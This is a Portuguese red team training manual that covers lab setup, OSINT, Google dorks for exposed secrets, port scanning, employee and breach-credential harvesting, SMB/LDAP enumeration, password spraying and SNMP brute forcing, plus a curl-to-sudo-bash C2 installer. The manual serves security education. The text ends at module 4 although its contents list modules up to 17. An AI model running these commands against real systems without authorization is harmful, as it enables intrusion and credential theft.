RED TEAM OPERATIONS 2026 | Be Safe — Mariana BS
RED TEAM OPERATIONS
Trilha Completa: Do Iniciante ao Avançado
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
Edição 2026 | Revisado e Atualizado
Be Safe — Mariana BS
Página 1 | Uso Educacional — Conteúdo Autorizado | Be Safe — Mariana BS
RED TEAM OPERATIONS 2026 | Be Safe — Mariana BS
SUMÁRIO
SUMÁRIO.............................................................................................................................................. 2
APRESENTAÇÃO ................................................................................................................................. 6
A Quem se Destina ..............................................................................................................................................6
Nota sobre Versionamento ..................................................................................................................................6
MÓDULO 0 — FUNDAMENTOS DE REDES (PRÉ-REQUISITO)......................................................... 7
Por que Estudar Redes Antes de Red Team?.....................................................................................................7
Conceitos Fundamentais Necessários ................................................................................................................7
Certificações e Blueprints Recomendados ..........................................................................................................7
CompTIA Network+ (N10-009) — Vendor Neutral ......................................................................................................... 8
Cisco CCNA (200-301) — Vendor Cisco ....................................................................................................................... 8
MÓDULO 1 — FUNDAMENTOS E MINDSET RED TEAM ................................................................. 10
1.1 O que é Red Team?.................................................................................................................................... 10
1.2 Tipos de Avaliação de Segurança Ofensiva ............................................................................................... 10
Vulnerability Assessment (VA) ..................................................................................................................................... 10
Penetration Test........................................................................................................................................................... 10
Red Team Operation ................................................................................................................................................... 10
Purple Team Exercise .................................................................................................................................................. 10
Adversary Simulation / Adversary Emulation ............................................................................................................... 11
Assumed Breach.......................................................................................................................................................... 11
1.3 Frameworks e Metodologias (2026) ........................................................................................................... 11
1.4 Legalidade e Ética no Brasil ....................................................................................................................... 11
Elementos Essenciais de um Contrato de Red Team .................................................................................................. 12
1.5 Estrutura de uma Equipe Red Team .......................................................................................................... 12
MÓDULO 2 — CONFIGURAÇÃO DE LABORATÓRIO ...................................................................... 13
2.1 Arquitetura do Laboratório Red Team ........................................................................................................ 13
Opção 1: Lab Local (Hypervisor) ................................................................................................................................. 13
Opção 2: Lab em Nuvem ............................................................................................................................................. 13
2.2 Kali Linux Rolling — Setup Inicial ............................................................................................................... 13
2.3 GOAD v3 — Active Directory Lab ............................................................................................................... 14
2.4 BloodHound CE — Instalação via BloodHound CLI (Método Oficial) ........................................................ 14
2.5 Plataformas de Prática (2026) .................................................................................................................... 14
MÓDULO 3 — RECONHECIMENTO E OSINT ................................................................................... 16
3.1 Reconhecimento Passivo............................................................................................................................ 16
3.1.1 Enumeração de Subdomínios ............................................................................................................................. 16
3.1.2 Google Dorks ...................................................................................................................................................... 16
3.1.3 OSINT de Infraestrutura ...................................................................................................................................... 16
3.2 Reconhecimento Ativo ................................................................................................................................ 17
3.2.1 Port Scanning com Nmap ................................................................................................................................... 17
3.2.2 Masscan + Nmap — Fluxo Recomendado ......................................................................................................... 17
3.2.3 Enumeração Web ............................................................................................................................................... 17
3.3 OSINT de Pessoas e Email ........................................................................................................................ 18
MÓDULO 4 — ENUMERAÇÃO E SCANNING DE VULNERABILIDADES ........................................ 19
4.1 Enumeração de Serviços ............................................................................................................................ 19
4.1.1 SMB (Portas 445 e 139)...................................................................................................................................... 19
4.1.2 LDAP / Active Directory....................................................................................................................................... 19
Página 2 | Uso Educacional — Conteúdo Autorizado | Be Safe — Mariana BS
RED TEAM OPERATIONS 2026 | Be Safe — Mariana BS
4.1.3 DNS .................................................................................................................................................................... 19
4.1.4 SNMP (Porta 161) ............................................................................................................................................... 19
4.2 Vulnerability Scanning................................................................................................................................. 20
4.2.1 Greenbone Community Edition (GCE) — Anteriormente OpenVAS ................................................................... 20
4.2.2 Nuclei v3 ............................................................................................................................................................. 20
4.3 Web — OWASP Top 10 (2025) .................................................................................................................. 20
4.4 Burp Suite Pro — Extensões Essenciais (2025) ........................................................................................ 21
MÓDULO 5 — EXPLORAÇÃO (EXPLOITATION) .............................................................................. 22
5.1 Metasploit Framework 6.x ........................................................................................................................... 22
Meterpreter — Comandos Essenciais ......................................................................................................................... 22
5.2 Exploração Manual de Vulnerabilidades Web ............................................................................................ 22
5.2.1 SQL Injection ...................................................................................................................................................... 22
5.2.2 Cross-Site Scripting (XSS) .................................................................................................................................. 23
5.2.3 Local File Inclusion (LFI) ..................................................................................................................................... 23
5.2.4 SSRF (Server-Side Request Forgery)................................................................................................................. 23
5.2.5 JWT Attacks ........................................................................................................................................................ 23
MÓDULO 6 — ENGENHARIA SOCIAL E PHISHING ......................................................................... 25
6.1 Ferramentas de Phishing ............................................................................................................................ 25
6.2 GoPhish — Campanha Completa ............................................................................................................... 25
Fluxo de Campanha ..................................................................................................................................................... 25
6.3 Evilginx3 — Adversary-in-the-Middle (AiTM) .............................................................................................. 25
6.4 Spear Phishing com AI (2026) .................................................................................................................... 26
MÓDULO 7 — ACTIVE DIRECTORY ATTACKS................................................................................ 27
7.1 Enumeração de Active Directory ................................................................................................................ 27
7.1.1 BloodHound CE — Coleta de Dados .................................................................................................................. 27
7.2 Ataques de Credenciais .............................................................................................................................. 27
7.2.1 Kerberoasting...................................................................................................................................................... 27
7.2.2 AS-REP Roasting ............................................................................................................................................... 27
7.2.3 Password Spraying ............................................................................................................................................. 28
7.2.4 Pass-the-Hash (PtH) ........................................................................................................................................... 28
7.3 NTLM Relay ................................................................................................................................................ 28
7.4 Escalada no Active Directory ...................................................................................................................... 28
7.4.1 DCSync ............................................................................................................................................................... 28
7.4.2 Golden Ticket ...................................................................................................................................................... 29
7.4.3 AD CS Attacks — Certipy (ESC1–ESC16) ......................................................................................................... 29
MÓDULO 8 — ESCALADA DE PRIVILÉGIOS ................................................................................... 30
8.1 Linux Privilege Escalation ........................................................................................................................... 30
8.1.1 Enumeração Automatizada ................................................................................................................................. 30
8.1.2 SUID Binaries ..................................................................................................................................................... 30
8.1.3 Sudo Abuse ........................................................................................................................................................ 30
8.1.4 Cron Jobs............................................................................................................................................................ 30
8.1.5 Vulnerabilidades de Kernel e Sistema (2024–2026) ........................................................................................... 30
8.2 Windows Privilege Escalation ..................................................................................................................... 31
8.2.1 Enumeração Automatizada ................................................................................................................................. 31
8.2.2 Token Impersonation — SeImpersonatePrivilege ............................................................................................... 31
8.2.3 AlwaysInstallElevated ......................................................................................................................................... 31
8.2.4 DLL Hijacking ...................................................................................................................................................... 31
MÓDULO 9 — MOVIMENTO LATERAL E PIVOTING ........................................................................ 32
9.1 Técnicas de Movimento Lateral .................................................................................................................. 32
9.1.1 Execução Remota ............................................................................................................................................... 32
Página 3 | Uso Educacional — Conteúdo Autorizado | Be Safe — Mariana BS
RED TEAM OPERATIONS 2026 | Be Safe — Mariana BS
9.2 Pivoting — Ferramentas ............................................................................................................................. 32
9.2.1 Ligolo-ng — Tunneling Transparente .................................................................................................................. 32
9.2.2 Chisel — Tunneling via HTTP ............................................................................................................................. 32
9.2.3 SSH Tunneling .................................................................................................................................................... 32
9.3 Credential Dumping .................................................................................................................................... 33
9.3.1 LSASS — Técnicas LOLBin................................................................................................................................ 33
9.3.2 SAM Database .................................................................................................................................................... 33
9.3.3 DPAPI — Credential Manager ............................................................................................................................ 33
MÓDULO 10 — COMMAND & CONTROL (C2).................................................................................. 34
10.1 Infraestrutura C2 — Arquitetura em Camadas ......................................................................................... 34
10.2 Sliver C2 — Framework Open-Source ..................................................................................................... 34
10.3 Havoc C2 .................................................................................................................................................. 34
10.4 Cobalt Strike (Comercial) .......................................................................................................................... 35
10.5 OPSEC de Infraestrutura .......................................................................................................................... 35
MÓDULO 11 — EVASÃO DE DEFESAS (AV/EDR) ........................................................................... 36
11.1 Camadas de Detecção de EDR Moderno................................................................................................. 36
11.2 AMSI Bypass ............................................................................................................................................. 36
11.3 Direct Syscalls — Evasão de Hooks de EDR ........................................................................................... 36
11.4 Userland Unhooking — Recarregar NTDLL Limpa .................................................................................. 36
11.5 Living Off the Land Binaries (LOLBins) ..................................................................................................... 37
11.6 Técnicas de Process Injection .................................................................................................................. 37
MÓDULO 12 — CLOUD RED TEAM .................................................................................................. 38
12.1 AWS Red Team ........................................................................................................................................ 38
12.2 Azure / Entra ID Red Team ....................................................................................................................... 38
12.3 Kubernetes Red Team .............................................................................................................................. 38
12.4 Ferramentas Multi-Cloud .......................................................................................................................... 39
MÓDULO 13 — WIRELESS E PHYSICAL RED TEAM ...................................................................... 40
13.1 Wireless Attacks ........................................................................................................................................ 40
WPA2 — Captura de Handshake e PMKID ................................................................................................................. 40
Evil Twin — Captura de Credenciais EAP Empresarial ............................................................................................... 40
13.2 RFID / NFC Cloning .................................................................................................................................. 40
13.3 Social Engineering Físico ......................................................................................................................... 40
MÓDULO 14 — RELATÓRIOS, FRAMEWORKS E COMUNICAÇÃO ............................................... 41
14.1 Frameworks de Relatório e Metodologia .................................................................................................. 41
14.1.1 PTES — Penetration Testing Execution Standard ............................................................................................ 41
14.1.2 OSSTMM — Open Source Security Testing Methodology Manual ................................................................... 41
14.1.3 NIST SP 800-115 .............................................................................................................................................. 41
14.1.4 MITRE ATT&CK — Mapeamento de TTPs ....................................................................................................... 42
14.2 Estrutura do Relatório de Red Team ........................................................................................................ 42
14.3 CVSS v4.0 — Classificação de Severidade ............................................................................................. 42
14.4 Ferramentas de Gestão e Tracking .......................................................................................................... 43
14.5 Comunicação com Stakeholders .............................................................................................................. 43
MÓDULO 15 — TRILHA DE CERTIFICAÇÕES 2026 ......................................................................... 44
15.1 Roadmap de Certificações ........................................................................................................................ 44
Fundamentos (Pré-Requisito) ...................................................................................................................................... 44
Nível Iniciante / Entrada em Ofensivo .......................................................................................................................... 44
Nível Intermediário ....................................................................................................................................................... 44
Nível Avançado ............................................................................................................................................................ 45
Página 4 | Uso Educacional — Conteúdo Autorizado | Be Safe — Mariana BS
RED TEAM OPERATIONS 2026 | Be Safe — Mariana BS
15.2 Recursos de Estudo .................................................................................................................................. 45
Referências Online Essenciais .................................................................................................................................... 45
MÓDULO 16 — TÓPICOS AVANÇADOS 2026 .................................................................................. 47
16.1 Desenvolvimento de Malware para Red Team ......................................................................................... 47
16.1.1 Shellcode Loader em C — XOR Decrypt + VirtualAlloc .................................................................................... 47
16.1.2 Implants em Rust (Tendência 2025–2026) ....................................................................................................... 47
16.2 AI/ML Red Team (2026)............................................................................................................................ 48
16.3 CI/CD Pipeline Attacks .............................................................................................................................. 48
16.4 Adversary Emulation — APT Simulation .................................................................................................. 48
MÓDULO 17 — GLOSSÁRIO E REFERÊNCIAS ............................................................................... 50
17.1 Glossário Técnico ..................................................................................................................................... 50
17.2 Referências e Links Verificados ................................................................................................................ 51
Página 5 | Uso Educacional — Conteúdo Autorizado | Be Safe — Mariana BS
RED TEAM OPERATIONS 2026 | Be Safe — Mariana BS
APRESENTAÇÃO
Este manual foi elaborado como uma referência técnica de Red Team para o mercado de
cibersegurança, cobrindo desde os fundamentos até técnicas utilizadas em operações reais em 2026.
Todo o conteúdo foi revisado criticamente para refletir o estado atual das ferramentas, frameworks e
metodologias — removendo informações depreciadas, corrigindo comandos, padronizando
nomenclatura e garantindo alinhamento com operações reais de adversary emulation, não apenas
ambientes CTF.
⚠️ DISCLAIMER LEGAL
Todo o conteúdo é exclusivamente para fins educacionais e uso em ambientes
devidamente autorizados. A execução de quaisquer técnicas descritas sem autorização
explícita e por escrito configura crime conforme a Lei 14.155/2021 (Brasil), a Lei
12.737/2012 (Lei Carolina Dieckmann) e equivalentes internacionais. O autor não se
responsabiliza pelo uso indevido das informações aqui contidas.
A Quem se Destina
• Estudantes iniciando na área de cibersegurança ofensiva
• Profissionais de TI migrando para segurança
• Pentesters buscando evoluir para operações de Red Team estruturadas
• Blue Teamers que querem compreender o lado ofensivo
• Profissionais preparando certificações OSCP, CRTO, CRTE, PNPT
Nota sobre Versionamento
As versões de ferramentas, frameworks e CVEs referenciados neste manual são verificadas até março
de 2026. Dado o ritmo de evolução da área, recomenda-se verificar repositórios oficiais antes de
qualquer uso em engajamento real.
Página 6 | Uso Educacional — Conteúdo Autorizado | Be Safe — Mariana BS
RED TEAM OPERATIONS 2026 | Be Safe — Mariana BS
MÓDULO 0 — FUNDAMENTOS DE REDES (PRÉ-
REQUISITO)
Por que Estudar Redes Antes de Red Team?
Redes são a infraestrutura sobre a qual todos os ataques transitam. Sem compreender como pacotes
são roteados, como protocolos funcionam e como segmentação de rede opera, o profissional de Red
Team não consegue interpretar resultados de scan, construir pivoting adequado, entender o
comportamento de C2 ou analisar tráfego capturado. Redes não são opcionais — são a base sobre a
qual todas as técnicas ofensivas estão construídas.
Conceitos Fundamentais Necessários
Conceito Por que importa para Red Team Onde Estudar
Modelo OSI e TCP/IP Entender em qual camada cada Network+ N10-009, CCNA 200-301
ataque opera (ARP: L2, ICMP: L3,
TCP: L4...)
Endereçamento IP e CIDR, subnetting, rotas — Network+ N10-009
Sub-redes essencial para pivoting e
enumeração de redes
Protocolos TCP/UDP Three-way handshake, flags, Network+ N10-009
behavior — base para análise de
scan
DNS Resolução, zone transfer, registros CCNA 200-301
— vetor de ataque e OSINT
HTTP/S Request/response, headers, Network+ / OWASP WSTG v4.2
cookies, TLS — base para web
attacks
VLAN e Segmentação Entender como redes corporativas CCNA 200-301
são segmentadas para planejar
pivoting
Roteamento (OSPF, Compreender alcance de redes e CCNA 200-301
BGP) tráfego em ambientes enterprise
Firewall e NAT Como tráfego é Network+ N10-009
bloqueado/permitido — guia regras
de C2 e evasão
Wireshark/tcpdump Análise de tráfego — verificar Prática livre
beacons, credenciais em claro,
anomalias
Certificações e Blueprints Recomendados
Página 7 | Uso Educacional — Conteúdo Autorizado | Be Safe — Mariana BS
RED TEAM OPERATIONS 2026 | Be Safe — Mariana BS
📌 RECOMENDAÇÃO DE ESTUDO
Antes de avançar para técnicas ofensivas, recomenda-se solidamente o conteúdo
equivalente ao Network+ N10-009 (CompTIA) ou ao CCNA 200-301 (Cisco). Ambas
cobrem os fundamentos de redes necessários para que as técnicas deste manual façam
sentido na prática.
CompTIA Network+ (N10-009) — Vendor Neutral
A Network+ é a certificação vendor-neutral mais amplamente reconhecida para fundamentos de redes.
Cobre OSI, TCP/IP, switching, roteamento, wireless, segurança de rede e troubleshooting. Ideal para
quem ainda não tem experiência com plataformas Cisco.
Domínio N10-009 Peso no Exame
1.0 Networking Concepts 23%
2.0 Network Implementation 20%
3.0 Network Operations 17%
4.0 Network Security 20%
5.0 Network Troubleshooting 20%
Blueprint Oficial Network+ N10-009 — [Link]/certifications/network →
[Link]
Objectives PDF direto — [Link]/training/resources/exam-objectives →
[Link]
Cisco CCNA (200-301) — Vendor Cisco
O CCNA 200-301 é a certificação de entrada da Cisco, abrangendo protocolos de roteamento e
switching, automação de redes, segurança básica e fundamentos de cloud e SD-WAN. Ambientes
enterprise no Brasil frequentemente usam Cisco — familiaridade com a plataforma é vantagem real em
engajamentos.
Domínio CCNA 200-301 Peso no Exame
Network Fundamentals 20%
Network Access 20%
IP Connectivity 25%
IP Services 10%
Security Fundamentals 15%
Automation and 10%
Programmability
Blueprint Oficial CCNA 200-301 — [Link] (exam 200-301) → [Link]
events/training-certifications/exams/current-list/[Link]
Página 8 | Uso Educacional — Conteúdo Autorizado | Be Safe — Mariana BS
RED TEAM OPERATIONS 2026 | Be Safe — Mariana BS
📚 RECURSOS GRATUITOS DE ESTUDO
Professor Messer ([Link]): cursos Network+ em vídeo, totalmente gratuitos
— reconhecido como referência. Jeremy's IT Lab (YouTube): CCNA 200-301 completo e
gratuito. Cisco Packet Tracer: simulador de redes gratuito — ideal para laboratório CCNA.
Página 9 | Uso Educacional — Conteúdo Autorizado | Be Safe — Mariana BS
RED TEAM OPERATIONS 2026 | Be Safe — Mariana BS
MÓDULO 1 — FUNDAMENTOS E MINDSET RED TEAM
1.1 O que é Red Team?
Red Team é uma prática de segurança ofensiva em que uma equipe adversarial simula ataques reais
a uma organização com o objetivo de testar as capacidades de detecção, resposta e resiliência do
Blue Team e dos controles de segurança. Diferencia-se do pentest clássico em escopo, duração,
objetivos e grau de sigilo operacional.
Característica Pentest Red Team Operation
Objetivo principal Identificar e demonstrar Testar a capacidade real de
vulnerabilidades detecção e resposta
Duração típica 1 a 2 semanas De 1 a 6 meses
Escopo Definido e delimitado formalmente Amplo, realístico, orientado a
objetivo
Conhecimento prévio Whitebox, greybox ou blackbox Geralmente greybox ou blackbox
Notificação Blue Team Frequente (coordenado) Nunca — operação cega
Foco do relatório Lista de vulnerabilidades + CVSS Narrativa de ataque, impacto,
lacunas de detecção
Metodologia de PTES, OWASP WSTG, NIST SP MITRE ATT&CK, Unified Kill Chain,
referência 800-115 Cyber Kill Chain
1.2 Tipos de Avaliação de Segurança Ofensiva
Vulnerability Assessment (VA)
Identificação automatizada de vulnerabilidades sem exploração ativa. Ferramentas amplamente
utilizadas: Tenable Nessus, Greenbone Community Edition (GVM), Qualys, Rapid7 InsightVM. Não
deve ser confundido com pentest.
Penetration Test
Exploração controlada de vulnerabilidades para demonstrar impacto de negócio. Estruturado por
metodologias como PTES e OWASP WSTG v4.2. Gera relatório técnico com achados, evidências e
recomendações.
Red Team Operation
Simulação de adversário (APT ou cibercriminoso) com campanhas de longa duração, pivoting, lateral
movement e objetivo final específico (crown jewels). Avalia capacidade real de detecção e resposta.
Purple Team Exercise
Exercício colaborativo entre Red Team e Blue Team para validar e melhorar detecções em tempo real.
Rastreado e documentado via plataformas como VECTR ([Link]). Não é uma operação cega — a
colaboração é o objetivo.
Página 10 | Uso Educacional — Conteúdo Autorizado | Be Safe — Mariana BS
RED TEAM OPERATIONS 2026 | Be Safe — Mariana BS
Adversary Simulation / Adversary Emulation
Modalidade avançada de Red Team onde o operador replica os TTPs documentados de um grupo
APT específico (ex: APT29, Lazarus). Usa planos de emulação do MITRE ATT&CK e plataformas
como CALDERA. Diferencia-se do Red Team genérico pelo nível de fidelidade ao adversário real.
Assumed Breach
Avaliação que parte do pressuposto de comprometimento já realizado. Foca exclusivamente em
movimento lateral, escalada de privilégios e exfiltração. Muito utilizado quando o cliente já suspeita de
comprometimento ou quer testar controles internos.
1.3 Frameworks e Metodologias (2026)
Framework Versão / Status Uso Principal
MITRE ATT&CK v18.1 (Out/2025) — v19 em Mapeamento de TTPs, relatórios,
desenvolvimento adversary emulation
PTES [Link] — referência Estrutura completa de pentest (7
ativa fases)
OWASP Testing Guide WSTG v4.2 — [Link] Testes de aplicações web
OSSTMM v3.0 — [Link] Metodologia de segurança
orientada a métricas
NIST SP 800-115 Rev. 2024 — [Link] Technical guide to information
security testing
Cyber Kill Chain 7 fases — Lockheed Martin Estrutura linear de ataque — uso
didático
Unified Kill Chain v2.0 — [Link] 18 fases — mais adequado para
Red Team moderno
MITRE ATLAS v5.4 (Fev/2026) — [Link] TTPs para ataques contra sistemas
de IA/ML
ℹ️ SOBRE TIBER-BR
O framework TIBER-EU (Threat Intelligence-Based Ethical Red Teaming) é uma iniciativa
do Banco Central Europeu para o setor financeiro. Até a data de publicação deste manual,
não há um framework TIBER-BR oficialmente publicado e homologado pelo Banco Central
do Brasil. O BCB possui iniciativas de segurança para o setor financeiro, mas não um
programa TIBER-BR formalizado. Referenciar TIBER-BR como framework existente no
Brasil é impreciso.
1.4 Legalidade e Ética no Brasil
📋 ARCABOUÇO LEGAL BRASILEIRO
Página 11 | Uso Educacional — Conteúdo Autorizado | Be Safe — Mariana BS
RED TEAM OPERATIONS 2026 | Be Safe — Mariana BS
Lei 14.155/2021: Agrava crimes de invasão de dispositivos (Art. 154-A CP) — pena de 1 a
4 anos de reclusão. Lei 12.737/2012 (Lei Carolina Dieckmann): criminaliza invasão de
dispositivos informáticos. LGPD (Lei 13.709/2018): impactos no tratamento de dados
durante testes — dados coletados devem ser tratados como sensíveis. Autorização por
escrito (Rules of Engagement) é MANDATÓRIA e deve ser assinada antes de qualquer
atividade.
Elementos Essenciais de um Contrato de Red Team
• Escopo técnico detalhado — IPs, domínios, sistemas, redes autorizadas
• Rules of Engagement (RoE) — o que pode e não pode ser executado
• Janelas de tempo autorizadas para execução
• Ponto de contato de emergência (get-out-of-jail card) — contato 24/7
• Cláusulas de confidencialidade e NDA
• Protocolo para descoberta de incidentes reais durante o exercício
• Definição do liaison/handler do lado do cliente
1.5 Estrutura de uma Equipe Red Team
Papel Responsabilidade Skills / Certs Relevantes
Red Team Lead Coordenação da operação, CRTO, CRTE, comunicação com
estratégia, relatório executivo stakeholders
Operator Execução técnica das fases de OSCP, PNPT, CRTO, scripting
ataque Python/PS
Phishing Specialist Campanhas de engenharia social e GoPhish, OPSEC, OSINT, evasão
pretexting de filtros
Infrastructure Specialist C2, redirectores, OPSEC de Sliver, Cobalt Strike, cloud, Nginx
infraestrutura
Report Writer Documentação técnica e relatório Escrita técnica, CVSS v4, MITRE
executivo ATT&CK
Página 12 | Uso Educacional — Conteúdo Autorizado | Be Safe — Mariana BS
RED TEAM OPERATIONS 2026 | Be Safe — Mariana BS
MÓDULO 2 — CONFIGURAÇÃO DE LABORATÓRIO
2.1 Arquitetura do Laboratório Red Team
Opção 1: Lab Local (Hypervisor)
Componente Solução Recomendada (2026)
Hypervisor VMware Workstation Pro 17 / VirtualBox 7.1 / Proxmox VE 8.x
SO de Ataque Linux Kali Linux Rolling (2026.x) / ParrotOS 6.x
SO de Ataque Windows Commando VM (2025) / Flare-VM
Alvos Linux Metasploitable 3, VulnHub, TryHackMe OVAs
Alvos Windows / AD GOAD v3 (Orange Cyberdefense), DetectionLab
C2 Server VM separada — Ubuntu 24.04 LTS (fora da rede de ataque)
Opção 2: Lab em Nuvem
Plataforma Características
AWS — Kali AMI oficial Imagem mantida pela Kali no AWS Marketplace, EC2 [Link]+
VPS Contabo/Vultr/Hetzner Custo reduzido para infraestrutura C2 (€5–20/mês)
Hack The Box (HTB) Labs em nuvem — Pro Labs para ambientes AD realísticos
TryHackMe AttackBox Kali no browser — ideal para iniciantes
2.2 Kali Linux Rolling — Setup Inicial
O Kali Linux adota um modelo rolling release, ou seja, não há versão fixa estável — as atualizações
são contínuas. Sempre usar o repositório atual e manter o sistema atualizado.
sudo apt update && sudo apt full-upgrade -y
sudo apt install -y kali-linux-everything
cat /etc/os-release # Verificar versão atual
# Ferramentas modernas via Go (instalar individualmente quando necessário)
go install [Link]/projectdiscovery/subfinder/v2/cmd/subfinder@latest
go install [Link]/projectdiscovery/httpx/cmd/httpx@latest
go install [Link]/projectdiscovery/nuclei/v3/cmd/nuclei@latest
# NetExec — instalação recomendada via pipx (ambientes isolados)
sudo apt install -y pipx
pipx ensurepath # Reabrir terminal após este comando
pipx install netexec
# Alternativa: pipx install git+[Link]
Página 13 | Uso Educacional — Conteúdo Autorizado | Be Safe — Mariana BS
RED TEAM OPERATIONS 2026 | Be Safe — Mariana BS
# Sliver C2 — framework open-source
curl [Link] | sudo bash
2.3 GOAD v3 — Active Directory Lab
Game of Active Directory (GOAD) é um laboratório de AD mantido pela Orange Cyberdefense,
amplamente utilizado para prática de técnicas Red Team em ambientes Windows multi-domínio.
Requer hardware adequado (16GB RAM+).
git clone [Link]
cd GOAD && pip3 install -r [Link]
# GOAD-Light (para hardware mais limitado — 2 DCs, 3 VMs)
cd ad/GOAD-Light/providers/virtualbox && vagrant up
2.4 BloodHound CE — Instalação via BloodHound CLI (Método Oficial)
O método oficial recomendado pela SpecterOps para instalação do BloodHound Community Edition é
via BloodHound CLI (bh-cli), que gerencia os containers Docker automaticamente.
# Download do BloodHound CLI (Linux amd64)
wget [Link]
[Link]
tar -xzf [Link]
# Instalar BloodHound CE
./bloodhound-cli install
./bloodhound-cli start
# Acessar a interface
# [Link]
# Credencial inicial: exibida no output do CLI no primeiro start
📌 SOBRE O MÉTODO DOCKER DIRETO
O comando 'curl -L [Link] | docker compose -f - up' ainda funciona para
instalação rápida, mas o método via BloodHound CLI é o recomendado pela SpecterOps
por oferecer melhor gerenciamento de versões e atualizações.
2.5 Plataformas de Prática (2026)
Plataforma Foco Nível
Hack The Box (HTB) Máquinas e Pro Labs (AD, cloud, Iniciante → Avançado
mobile)
Página 14 | Uso Educacional — Conteúdo Autorizado | Be Safe — Mariana BS
RED TEAM OPERATIONS 2026 | Be Safe — Mariana BS
TryHackMe Trilhas guiadas — Red Teaming Iniciante → Intermediário
Path disponível
PortSwigger Web Web security — totalmente gratuito Iniciante → Avançado
Security Academy
Zero-Point Security AD Red Team com Cobalt Strike Intermediário → Avançado
(CRTO Lab) em lab dedicado
Offensive Security Labs para OSCP prep, máquinas Intermediário → Avançado
Proving Grounds retiradas do OSCP
Altered Security Labs AD, Azure e multi-domain Red Intermediário → Avançado
Team
AttackIQ Academy Purple team e MITRE ATT&CK — Iniciante → Intermediário
gratuito
Página 15 | Uso Educacional — Conteúdo Autorizado | Be Safe — Mariana BS
RED TEAM OPERATIONS 2026 | Be Safe — Mariana BS
MÓDULO 3 — RECONHECIMENTO E OSINT
3.1 Reconhecimento Passivo
3.1.1 Enumeração de Subdomínios
# Subfinder — ferramenta amplamente utilizada para enumeração passiva
subfinder -d [Link] -all -recursive -o [Link]
# BBOT (Bighuge BLS OSINT Tool) — framework modular de OSINT
pip install bbot
bbot -t [Link] -p subdomain-enum
# Assetfinder
assetfinder --subs-only [Link] | tee -a [Link]
# Verificar hosts ativos com httpx
cat [Link] | httpx -status-code -title -tech-detect -o live_hosts.txt
3.1.2 Google Dorks
Dork Objetivo
site:[Link] filetype:pdf Documentos PDF expostos publicamente
site:[Link] inurl:admin Painéis administrativos ou de login
OR inurl:login
site:[Link] "index of" Directory listing aberto
"@[Link]" filetype:xlsx Planilhas com endereços de email
OR filetype:csv
site:[Link] "[Link]" Secrets expostos no GitHub
password OR token OR api_key
site:[Link] ext:env OR Arquivos de configuração expostos
ext:config OR ext:xml
site:[Link] OR Dados vazados em paste sites
site:[Link] "[Link]"
3.1.3 OSINT de Infraestrutura
# Shodan CLI
shodan search 'org:"Target Organization"' --fields ip_str,port,hostnames,org
shodan search 'ssl:[Link] 200'
shodan search '[Link]:"Target" [Link]'
# Censys — alternativa ao Shodan
censys search '[Link]: [Link]' --index-type certificates
Página 16 | Uso Educacional — Conteúdo Autorizado | Be Safe — Mariana BS
RED TEAM OPERATIONS 2026 | Be Safe — Mariana BS
# FOFA — motor de busca de infraestrutura exposta (popular 2025+)
fofa -q 'domain="[Link]"'
# Certificate Transparency — [Link]
curl -s '[Link] | jq '.[].name_value' | sort -u
3.2 Reconhecimento Ativo
3.2.1 Port Scanning com Nmap
# Discovery de hosts ativos
nmap -sn [Link]/24 -oG [Link]
# Scan completo — portas, versões e scripts padrão
nmap -sC -sV -p- --min-rate 5000 -T4 [Link] -oA full_scan
# Scan UDP (top 20 portas mais comuns)
sudo nmap -sU --top-ports 20 [Link]
# Scripts NSE específicos
nmap --script smb-vuln* [Link] -p 445
nmap --script http-enum,http-title [Link] -p 80,443,8080
nmap --script ssl-heartbleed,ssl-dh-params [Link] -p 443
🔒 OPSEC — SCANNING
Em operações reais de Red Team, scans de alto volume como nmap -p- --min-rate 5000
são detectáveis por SIEMs e NDR. Para operações que exigem furtividade, considerar
masscan com rate menor, scans em horários específicos e técnicas de fragmentação (-f no
nmap). Adaptar a agressividade ao nível de OPSEC requerido pela RoE.
3.2.2 Masscan + Nmap — Fluxo Recomendado
# Fase 1: Descoberta rápida de portas com masscan
sudo masscan -p1-65535 [Link]/24 --rate=5000 -oL [Link]
grep 'open' [Link] | awk '{print $4}' | sort -u > live_ips.txt
# Fase 2: Scan detalhado nos IPs encontrados
nmap -sV -sC -iL live_ips.txt -oA nmap_targeted
3.2.3 Enumeração Web
# Feroxbuster — fuzzing de diretórios e arquivos
feroxbuster -u [Link] -w /usr/share/seclists/Discovery/Web-Content/raft-
[Link] -x php,asp,aspx,txt,bak -k -t 50
# ffuf — fuzzing rápido e flexível
Página 17 | Uso Educacional — Conteúdo Autorizado | Be Safe — Mariana BS
RED TEAM OPERATIONS 2026 | Be Safe — Mariana BS
ffuf -u [Link] -w /usr/share/seclists/Discovery/Web-Content/[Link] -
fc 404
# Nuclei v3 — scanner baseado em templates (9000+ templates)
nuclei -update-templates
nuclei -u [Link] -severity critical,high -o nuclei_results.txt
3.3 OSINT de Pessoas e Email
# theHarvester v4 — coleta de emails, hosts, nomes
theHarvester -d [Link] -b all -f [Link]
# CrossLinked — enumerar funcionários via LinkedIn
python3 [Link] -f '{first}.{last}@[Link]' 'Target Corporation'
# h8mail — verificar credenciais em breaches
h8mail -t target@[Link] --local /path/to/breach-data
Página 18 | Uso Educacional — Conteúdo Autorizado | Be Safe — Mariana BS
RED TEAM OPERATIONS 2026 | Be Safe — Mariana BS
MÓDULO 4 — ENUMERAÇÃO E SCANNING DE
VULNERABILIDADES
4.1 Enumeração de Serviços
4.1.1 SMB (Portas 445 e 139)
# NetExec (nxc) — instalado via pipx
nxc smb [Link]/24 --gen-relay-list relay_targets.txt
nxc smb [Link] -u 'user' -p 'password' --shares
nxc smb [Link] -u [Link] -p [Link] --continue-on-success
# enum4linux-ng — enumeração completa de SMB/LDAP
enum4linux-ng -A [Link] -oY [Link]
# smbmap — verificar permissões de shares
smbmap -H [Link] -u '' -p '' # Null session
smbmap -H [Link] -u 'user' -p 'password'
4.1.2 LDAP / Active Directory
# ldapdomaindump — dump de objetos AD via LDAP
ldapdomaindump -u 'DOMAIN\user' -p 'password' [Link] -o ldap_dump/
# RustHound — coletor BloodHound executável em Linux
rusthound -d [Link] -u user@[Link] -p 'password' --zip -o /tmp/bh
# [Link] — coletor Python (legacy, mas funcional)
bloodhound-python -d [Link] -u user -p 'password' -ns [Link] -c all --zip
4.1.3 DNS
# Zone Transfer — se servidor mal configurado
dig axfr @[Link] [Link]
# dnsx — resolução em massa
cat [Link] | dnsx -a -cname -mx -resp -o dns_resolved.txt
4.1.4 SNMP (Porta 161)
# onesixtyone — brute force de community strings
onesixtyone -c /usr/share/seclists/Discovery/SNMP/[Link] [Link]
